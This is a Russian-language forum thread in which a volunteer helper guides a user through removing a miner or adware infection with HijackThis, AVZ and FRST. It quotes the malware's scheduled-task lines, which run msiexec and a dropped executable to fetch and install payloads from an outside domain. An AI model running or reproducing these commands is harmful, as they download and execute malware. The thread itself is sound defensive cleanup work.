Здравствуйте, помогите избавится от вируса, засел в "Оперативная память = C:\Windows\SysWOW64\svchost.exe". Периодически открываются рандомные сайты. Нод32 удалить не может, но ругается. По глупости запустил один exe-шник и проигнорил предупреждение. Что делать?
Последний раз редактировалось acidsykt; 15.10.2018 в 21:18.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) acidsykt, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки :Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.Код:O22 - Task: {2F817A83-8B15-6417-4F79-B191281625BD} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://101news101.org/cl/?guid=4j2hg3xffc2vbvwfyj56v384qhse8ei2&prid=1&pid=4_1092_0 O22 - Task: {33E47170-651F-03C9-F0E3-7D53A1433D31} - C:\Users\acid\tmYYIUe.exe -i http://inthemel.info/p3qst89l9vbw.yie -q O22 - Task: {8CB255B6-B941-82C7-1F33-19F77C9FD5AA} - C:\Windows\system32\msiexec.exe -i http://inthemel.info/qfzzdqrdghef.hoo -q
Выполните скрипт в AVZ при наличии доступа в интернет:После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.Код:var LogPath : string; ScriptPath : string; begin LogPath := GetAVZDirectory + 'log\avz_log.txt'; if FileExists(LogPath) Then DeleteFile(LogPath); ScriptPath := GetAVZDirectory +'ScanVuln.txt'; if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!'); exit; end; end; if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false) end.
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к броузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.
Последний раз редактировалось Vvvyg; 15.10.2018 в 22:05.
WBR,
Vadim
Пока не уверен, но вроде полет нормальный. Спасибо за быструю помощь
Результат скрипта в AVZ прикрепите ещё.
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
WBR,
Vadim
AVZ мне сказал что все в порядке и никаких логов не создал.
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!Код:CreateRestorePoint: 2018-10-11 20:24 - 2017-09-15 21:20 - 000000000 ____D C:\ProgramData\boost_interprocess 2009-07-14 04:14 - 2009-07-14 04:14 - 000073216 ____N (Microsoft Corporation) C:\Users\acid\tmYYIUe.exe 2009-07-14 04:14 - 2009-07-14 04:14 - 000186368 ____N (Microsoft Corporation) C:\Users\acid\AppData\Roaming\ElARAemlCOoEO.exe 2017-07-18 22:27 - 2017-07-19 11:53 - 000001181 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.1.txt 2017-07-18 22:27 - 2017-07-19 11:26 - 000001181 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.2.txt 2017-07-18 22:27 - 2017-07-19 10:57 - 000000919 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.3.txt 2017-07-18 22:27 - 2017-07-18 22:27 - 000001181 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.4.txt 2017-07-18 22:27 - 2017-07-19 12:30 - 000000919 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.txt 2017-07-18 22:27 - 2017-07-19 12:30 - 000000000 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt FirewallRules: [{774974B9-F485-4500-B455-67C1E740DD3F}] => (Allow) C:\Windows\SysWOW64\msiexec.exe FirewallRules: [{C133EAFC-1BBB-4C46-9C28-B2C6353EF2AA}] => (Allow) C:\Windows\SysWOW64\HuolUsAgMiaV.exe FirewallRules: [{E31F3CB3-F0C7-4F08-A3A1-C09BEC56E619}] => (Allow) C:\Users\acid\tmYYIUe.exe FirewallRules: [{73CA5F1B-4471-4C25-A1C9-6371DE6E3A2F}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{15004EB8-6539-4CC4-85BA-829B728BD8D7}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{705E5853-1E58-4D53-836B-B34AD2BDC547}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{2E97151C-A8C0-49A0-A294-F7CD606630F7}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{DC4879A0-D62E-4453-9FC7-675A54137D72}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{1FFD8906-1894-4A1C-81D5-492DD61DCB94}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{DA1F91B6-CBD5-44F2-92A0-E1C5579578F0}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{0D418CC5-B01A-41FC-9DCA-7FE82CCA938A}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{DD750106-1D8C-4200-949B-6DABF01090FF}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{5213EE0E-76D7-4468-9074-E19C934709C6}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7EDEDA6C-AAB4-4D44-A986-EB0C70468910}] => (Allow) C:\Windows\SysWOW64\svchost.exe Reboot:
Отключите до перезагрузки антивирус, закройте все браузеры,
Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
WBR,
Vadim
Сделано
Все остатки майнера дочистили.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
WBR,
Vadim
Ваши права в разделе
Ответить с цитированием
